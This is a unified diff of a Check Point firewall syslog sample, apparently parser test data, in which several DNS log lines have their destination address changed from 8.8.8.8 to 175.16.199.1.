 <134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80ddf6,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53770"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
-<134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503734"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46371"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503734"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56990"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503734"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46371"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503734"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56990"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58686"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddfa,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58834"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddfa,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38127"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddfa,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38127"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddfa,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38100"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10108"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddfa,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39182"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:42:20Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80ddfe,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42642"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T17:42:21Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80ddfe,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42640"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
-<134>1 2020-03-29T17:42:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddff,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61743"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:42:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddff,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61743"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:42:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80de0a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50675"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:42:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80de0a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50676"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:43:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80de4e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33081"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
@@ -3249,22 +3249,22 @@
 <134>1 2020-03-29T17:48:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df6c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:48:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df72,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50684"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:48:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df72,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50685"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"18.225.36.18"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44072"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37294"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37294"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"178.20.174.135"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46336"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54085"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54085"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"18.225.36.18"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44076"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54372"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
